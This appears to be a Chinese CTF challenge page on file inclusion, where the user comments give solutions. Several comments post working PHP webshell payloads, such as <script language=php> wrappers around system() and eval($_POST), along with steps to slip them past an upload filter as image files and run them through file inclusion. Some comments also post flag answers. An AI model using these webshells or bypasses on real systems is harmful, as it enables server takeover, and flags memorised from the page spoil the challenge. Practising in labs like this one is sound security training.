文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 3884
提  示: 文件包含
描  述:
文件包含2
评论
zhuizhui 2天前

<script language=php>system("cat /flag")</script> webshell.php;.png

回复 0

leonleonleon 18天前

1.'<'+'?'+'php' 和'>'会被过滤; 2.后缀名会被过滤; 3.用'<' script lanugage=php 后面自己闭合一下,最后文件包含上传获取flag

回复 0

shingu 3月前

file=/flag,怎么会这么简单?

回复 0

volnu1l 5月前

新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg

回复 0

yanqiye 6月前

用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。

回复 1

G3tcH4r 7月前

花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思

回复 1

迷茫的三千面 8月前

flag{414a91ba57a5e0b5a4eb725b75f5030e}

回复 0

hao7 8月前

flag{69fc76f3ef98a524a3ef56977fc02278}

回复 0

CHLing 1年前

http://114.67.175.224:18550/index.php?file=//flag

回复 1

qiusheng 1年前

1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX

回复 0

WriteUp

image
harry

4 金币

评分(5)

解题动态

海浪geigei 攻破了该题 6小时前
alfsage 攻破了该题 18小时前
Hehe0619 攻破了该题 1天前
ww__ 攻破了该题 1天前
a1451753998 攻破了该题 1天前
dahuaaistudy 攻破了该题 2天前
YGLZ 攻破了该题 2天前
zhuizhui 攻破了该题 2天前
人闲桂花落 攻破了该题 3天前
roopelee 攻破了该题 4天前
dwx1583 攻破了该题 4天前
mecurio 攻破了该题 5天前
qidianzhi 攻破了该题 5天前
跃迁ctfer 攻破了该题 6天前
hackerbugku 攻破了该题 7天前
Future92 攻破了该题 7天前
maomaoht 攻破了该题 7天前
aaaaab 攻破了该题 8天前
千机www 攻破了该题 10天前
QwQQwQ 攻破了该题 10天前
问题反馈